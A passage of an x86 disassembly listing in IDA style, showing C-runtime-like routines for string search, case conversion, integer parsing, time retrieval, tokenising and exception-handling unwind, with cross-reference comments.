jz short loc_41740E
test al, al
jz short loc_417408
loc_4173FB: ; CODE XREF: sub_4173D0+36�j
mov al, [esi]
add esi, 1
loc_417400: ; CODE XREF: sub_4173D0+45�j
cmp al, dl
jz short loc_41740E
test al, al
jnz short loc_4173FB
loc_417408: ; CODE XREF: sub_4173D0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41740E: ; CODE XREF: sub_4173D0+25�j
; sub_4173D0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_417400
lea edi, [esi-1]
loc_41741A: ; CODE XREF: sub_4173D0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_417449
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4173E8
mov al, [ecx+3]
test al, al
jz short loc_417449
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41741A
jmp short loc_4173E8
; ---------------------------------------------------------------------------
loc_41743D: ; CODE XREF: sub_4173D0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_417E16
; ---------------------------------------------------------------------------
loc_417449: ; CODE XREF: sub_4173D0+4F�j
; sub_4173D0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_417450: ; CODE XREF: sub_4173D0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4173D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417456 proc near ; CODE XREF: sub_403810+BF�p
; sub_403810+12C�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_42BE38
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
call sub_41915F
mov esi, [eax+64h]
mov [ebp+var_20], esi
cmp esi, off_4323DC
jz short loc_417484
call sub_419F8E
mov esi, eax
mov [ebp+var_20], esi
loc_417484: ; CODE XREF: sub_417456+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_4174B3
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_417561
loc_417498: ; CODE XREF: sub_417456+56�j
mov cl, [edx]
cmp cl, 61h
jl short loc_4174A9
cmp cl, 7Ah
jg short loc_4174A9
sub cl, 20h
mov [edx], cl
loc_4174A9: ; CODE XREF: sub_417456+47�j
; sub_417456+4C�j
inc edx
cmp [edx], bl
jnz short loc_417498
jmp loc_417561
; ---------------------------------------------------------------------------
loc_4174B3: ; CODE XREF: sub_417456+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push eax
call sub_41C139
add esp, 20h
mov [ebp+var_24], eax
cmp eax, ebx
jz loc_41755E
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41750B
; ---------------------------------------------------------------------------
loc_4174F4: ; DATA XREF: .text:stru_42BE38�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4174F8: ; DATA XREF: .text:stru_42BE38�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_41750B: ; CODE XREF: sub_417456+9C�j
cmp edi, ebx
jnz short loc_417525
push [ebp+var_24]
call sub_416DAF
pop ecx
mov edi, eax
mov [ebp+var_1C], 1
cmp edi, ebx
jz short loc_417552
loc_417525: ; CODE XREF: sub_417456+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_24]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push dword ptr [esi+14h]
call sub_41C139
add esp, 20h
test eax, eax
jz short loc_417552
push edi
push [ebp+arg_0]
call sub_41BF70
pop ecx
pop ecx
loc_417552: ; CODE XREF: sub_417456+CD�j
; sub_417456+EF�j
cmp [ebp+var_1C], ebx
jz short loc_41755E
push edi
call sub_416C97
pop ecx
loc_41755E: ; CODE XREF: sub_417456+7C�j
; sub_417456+FF�j
mov eax, [ebp+arg_0]
loc_417561: ; CODE XREF: sub_417456+3C�j
; sub_417456+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_417456 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41756A proc near ; CODE XREF: sub_417729+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_41915F
mov esi, [eax+64h]
cmp esi, off_4323DC
jz short loc_417588
call sub_419F8E
mov esi, eax
loc_417588: ; CODE XREF: sub_41756A+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_417594: ; CODE XREF: sub_41756A+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_4175AE
push 8
push eax
push esi
call sub_419D8B
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_4175B8
; ---------------------------------------------------------------------------
loc_4175AE: ; CODE XREF: sub_41756A+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_4175B8: ; CODE XREF: sub_41756A+42�j
test eax, eax
jz short loc_4175C1
mov bl, [edi]
inc edi
jmp short loc_417594
; ---------------------------------------------------------------------------
loc_4175C1: ; CODE XREF: sub_41756A+50�j
cmp bl, 2Dh
jnz short loc_4175CC
or [ebp+arg_C], 2
jmp short loc_4175D1
; ---------------------------------------------------------------------------
loc_4175CC: ; CODE XREF: sub_41756A+5A�j
cmp bl, 2Bh
jnz short loc_4175D4
loc_4175D1: ; CODE XREF: sub_41756A+60�j
mov bl, [edi]
inc edi
loc_4175D4: ; CODE XREF: sub_41756A+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_417719
cmp eax, 1
jz loc_417719
cmp eax, 24h
jg loc_417719
test eax, eax
push 10h
pop ecx
jnz short loc_41761C
cmp bl, 30h
jz short loc_417606
mov [ebp+arg_8], 0Ah
jmp short loc_417634
; ---------------------------------------------------------------------------
loc_417606: ; CODE XREF: sub_41756A+91�j
mov al, [edi]
cmp al, 78h
jz short loc_417619
cmp al, 58h
jz short loc_417619
mov [ebp+arg_8], 8
jmp short loc_417634
; ---------------------------------------------------------------------------
loc_417619: ; CODE XREF: sub_41756A+A0�j
; sub_41756A+A4�j
mov [ebp+arg_8], ecx
loc_41761C: ; CODE XREF: sub_41756A+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_417634
cmp bl, 30h
jnz short loc_417634
mov al, [edi]
cmp al, 78h
jz short loc_417630
cmp al, 58h
jnz short loc_417634
loc_417630: ; CODE XREF: sub_41756A+C0�j
inc edi
mov bl, [edi]
inc edi
loc_417634: ; CODE XREF: sub_41756A+9A�j
; sub_41756A+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41763C: ; CODE XREF: sub_41756A+134�j
mov esi, off_432A40
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_417656
movsx ecx, bl
sub ecx, 30h
jmp short loc_417675
; ---------------------------------------------------------------------------
loc_417656: ; CODE XREF: sub_41756A+E2�j
test cx, 103h
jz short loc_4176A0
cmp bl, 61h
jl short loc_41766F
cmp bl, 7Ah
jg short loc_41766F
movsx ecx, bl
sub ecx, 20h
jmp short loc_417672
; ---------------------------------------------------------------------------
loc_41766F: ; CODE XREF: sub_41756A+F6�j
; sub_41756A+FB�j
movsx ecx, bl
loc_417672: ; CODE XREF: sub_41756A+103�j
add ecx, 0FFFFFFC9h
loc_417675: ; CODE XREF: sub_41756A+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_4176A0
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41768F
jnz short loc_417689
cmp ecx, edx
jbe short loc_41768F
loc_417689: ; CODE XREF: sub_41756A+119�j
or [ebp+arg_C], 4
jmp short loc_41769B
; ---------------------------------------------------------------------------
loc_41768F: ; CODE XREF: sub_41756A+117�j
; sub_41756A+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41769B: ; CODE XREF: sub_41756A+123�j
mov bl, [edi]
inc edi
jmp short loc_41763C
; ---------------------------------------------------------------------------
loc_4176A0: ; CODE XREF: sub_41756A+F1�j
; sub_41756A+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_4176B7
cmp [ebp+arg_4], 0
jz short loc_4176B1
mov edi, [ebp+arg_0]
loc_4176B1: ; CODE XREF: sub_41756A+142�j
and [ebp+var_4], 0
jmp short loc_417702
; ---------------------------------------------------------------------------
loc_4176B7: ; CODE XREF: sub_41756A+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_4176DB
test al, 1
jnz short loc_417702
and eax, 2
jz short loc_4176D2
cmp [ebp+var_4], 80000000h
ja short loc_4176DB
loc_4176D2: ; CODE XREF: sub_41756A+15D�j
test eax, eax
jnz short loc_417702
cmp [ebp+var_4], esi
jbe short loc_417702
loc_4176DB: ; CODE XREF: sub_41756A+154�j
; sub_41756A+166�j
call sub_41B935
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_4176F2
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_417702
; ---------------------------------------------------------------------------
loc_4176F2: ; CODE XREF: sub_41756A+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_417702: ; CODE XREF: sub_41756A+14B�j
; sub_41756A+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41770B
mov [eax], edi
loc_41770B: ; CODE XREF: sub_41756A+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_417714
neg [ebp+var_4]
loc_417714: ; CODE XREF: sub_41756A+1A5�j
mov eax, [ebp+var_4]
jmp short loc_417724
; ---------------------------------------------------------------------------
loc_417719: ; CODE XREF: sub_41756A+6F�j
; sub_41756A+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_417722
mov [eax], ecx
loc_417722: ; CODE XREF: sub_41756A+1B4�j
xor eax, eax
loc_417724: ; CODE XREF: sub_41756A+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41756A endp
; =============== S U B R O U T I N E =======================================
sub_417729 proc near ; CODE XREF: sub_404260+440�p
; sub_409806+2AFE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41756A
add esp, 10h
retn
sub_417729 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417740 proc near ; CODE XREF: sub_404260+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword_422160 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_418480
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_417777
mov [ecx], eax
locret_417777: ; CODE XREF: sub_417740+33�j
leave
retn
sub_417740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417779 proc near ; CODE XREF: sub_404807+2A�p
; sub_40528F+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_41915F
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_4177A5: ; CODE XREF: sub_417779+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_4177A5
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4177D4
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_4177D4
; ---------------------------------------------------------------------------
loc_4177CF: ; CODE XREF: sub_417779+72�j
test al, al
jz short loc_4177ED
inc edx
loc_4177D4: ; CODE XREF: sub_417779+4C�j
; sub_417779+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_4177CF
loc_4177ED: ; CODE XREF: sub_417779+58�j
mov ebx, edx
jmp short loc_417809
; ---------------------------------------------------------------------------
loc_4177F1: ; CODE XREF: sub_417779+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_417810
inc edx
loc_417809: ; CODE XREF: sub_417779+76�j
cmp byte ptr [edx], 0
jnz short loc_4177F1
jmp short loc_417814
; ---------------------------------------------------------------------------
loc_417810: ; CODE XREF: sub_417779+8D�j
and byte ptr [edx], 0
inc edx
loc_417814: ; CODE XREF: sub_417779+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_41C526
leave
retn
sub_417779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417834 proc near ; CODE XREF: sub_405DD1+AF�p
; sub_409806+573A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_42BE48
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_41B092
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41C534
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_4189AC
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_41C5BC
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417888
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_417834 endp
; =============== S U B R O U T I N E =======================================
sub_417888 proc near ; CODE XREF: sub_417834+46�p
; DATA XREF: .text:stru_42BE48�o
push dword ptr [ebp-1Ch]
call sub_41B0E4
pop ecx
retn
sub_417888 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417892 proc near ; CODE XREF: sub_41795A+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_417946
cmp dword ptr [esi+24h], 0
jz short loc_4178B8
cmp ebx, 7Fh
jbe loc_417946
loc_4178B8: ; CODE XREF: sub_417892+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_4178E2
cmp [esi+28h], edi
jle short loc_4178D5
push edi
push ebx
push esi
call sub_419D8B
add esp, 0Ch
jmp short loc_4178DE
; ---------------------------------------------------------------------------
loc_4178D5: ; CODE XREF: sub_417892+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_4178DE: ; CODE XREF: sub_417892+41�j
test eax, eax
jz short loc_417953
loc_4178E2: ; CODE XREF: sub_417892+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417903
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41790C
; ---------------------------------------------------------------------------
loc_417903: ; CODE XREF: sub_417892+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_41790C: ; CODE XREF: sub_417892+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_41C139
add esp, 20h
test eax, eax
jz short loc_417953
cmp eax, edi
jnz short loc_417939
movzx eax, [ebp+var_4]
jmp short loc_417955
; ---------------------------------------------------------------------------
loc_417939: ; CODE XREF: sub_417892+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_417955
; ---------------------------------------------------------------------------
loc_417946: ; CODE XREF: sub_417892+11�j
; sub_417892+20�j
cmp ebx, 41h
jl short loc_417953
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_417955
loc_417953: ; CODE XREF: sub_417892+4E�j
; sub_417892+9B�j ...
mov eax, ebx
loc_417955: ; CODE XREF: sub_417892+A5�j
; sub_417892+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417892 endp
; =============== S U B R O U T I N E =======================================
sub_41795A proc near ; CODE XREF: sub_407309+6�p
; sub_4076F4+56�p ...
arg_0 = dword ptr 4
call sub_41915F
mov eax, [eax+64h]
cmp eax, off_4323DC
jz short loc_41796F
call sub_419F8E
loc_41796F: ; CODE XREF: sub_41795A+E�j
push [esp+arg_0]
push eax
call sub_417892
pop ecx
pop ecx
retn
sub_41795A endp
; =============== S U B R O U T I N E =======================================
sub_41797C proc near ; CODE XREF: sub_407B24+27�p
; sub_407B65+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_416D83
pop ecx
pop ecx
retn
sub_41797C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41798A proc near ; CODE XREF: sub_41CAA6+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41798A endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4179BA proc near ; CODE XREF: sub_41C721+25�p
; sub_41C92A+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4179BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4179C1 proc near ; CODE XREF: sub_417A6D+5A�p
; sub_41CAA6:loc_41CAC9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_4179EA
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_4218C6 ; RtlUnwind
loc_4179EA: ; DATA XREF: sub_4179C1+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4179C1 endp
; ---------------------------------------------------------------------------
loc_417A13: ; CODE XREF: .text:00421EC2�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41CDAF
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_417A49: ; DATA XREF: sub_417BED+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_41CDAF
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A6D proc near ; DATA XREF: sub_417C3E+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_417A8E
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_417ADB
; ---------------------------------------------------------------------------
loc_417A8E: ; CODE XREF: sub_417A6D+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CDAF
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_417ACC
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4179C1
loc_417ACC: ; CODE XREF: sub_417A6D+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_417ADB: ; CODE XREF: sub_417A6D+1F�j
pop ebx
pop ebp
retn
sub_417A6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417ADE proc near ; CODE XREF: sub_41CB0D+52�p
; sub_41CBCD+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_417B34
loc_417AFC: ; CODE XREF: sub_417ADE+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_417B06
call sub_41CE86
loc_417B06: ; CODE XREF: sub_417ADE+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_417B1A
cmp ecx, [eax+8]
jle short loc_417B1F
loc_417B1A: ; CODE XREF: sub_417ADE+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_417B2B
loc_417B1F: ; CODE XREF: sub_417ADE+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_417B2B: ; CODE XREF: sub_417ADE+3F�j
cmp [ebp+arg_4], 0
jge short loc_417AFC
mov eax, [ebp+var_4]
loc_417B34: ; CODE XREF: sub_417ADE+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_417B48
cmp esi, eax
jbe short loc_417B4D
loc_417B48: ; CODE XREF: sub_417ADE+64�j
call sub_41CE86
loc_417B4D: ; CODE XREF: sub_417ADE+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_417ADE endp
; =============== S U B R O U T I N E =======================================
sub_417B58 proc near ; CODE XREF: sub_41C783+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_41915F
mov eax, [eax+84h]
mov [esi+4], eax
call sub_41915F
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_417B58 endp
; =============== S U B R O U T I N E =======================================
sub_417B80 proc near ; CODE XREF: sub_41C8C6+4B�p
arg_0 = dword ptr 4
call sub_41915F
mov eax, [eax+84h]
jmp short loc_417B98
; ---------------------------------------------------------------------------
loc_417B8D: ; CODE XREF: sub_417B80+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_417B9E
mov eax, [eax+4]
loc_417B98: ; CODE XREF: sub_417B80+B�j
test eax, eax
jnz short loc_417B8D
inc eax
retn
; ---------------------------------------------------------------------------
loc_417B9E: ; CODE XREF: sub_417B80+13�j
xor eax, eax
retn
sub_417B80 endp
; =============== S U B R O U T I N E =======================================
sub_417BA1 proc near ; CODE XREF: sub_41C8C6+9�p
arg_0 = dword ptr 4
push esi
call sub_41915F
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_417BC3
call sub_41915F
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417BC3: ; CODE XREF: sub_417BA1+10�j
call sub_41915F
mov eax, [eax+84h]
jmp short loc_417BD9
; ---------------------------------------------------------------------------
loc_417BD0: ; CODE XREF: sub_417BA1+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_417BE5
mov eax, ecx
loc_417BD9: ; CODE XREF: sub_417BA1+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_417BD0
pop esi
jmp sub_41CE86
; ---------------------------------------------------------------------------
loc_417BE5: ; CODE XREF: sub_417BA1+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_417BA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417BED proc near ; CODE XREF: sub_41C783+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_417A49
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41CEC0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_417BED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C3E proc near ; CODE XREF: sub_41CB0D+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_417A6D
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_417CC1
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_41915F
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_417CC1: ; DATA XREF: sub_417C3E+3A�o
cmp [ebp+var_4], 0
jz short loc_417CDE
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_417CE7
; ---------------------------------------------------------------------------
loc_417CDE: ; CODE XREF: sub_417C3E+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_417CE7: ; CODE XREF: sub_417C3E+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_417C3E endp
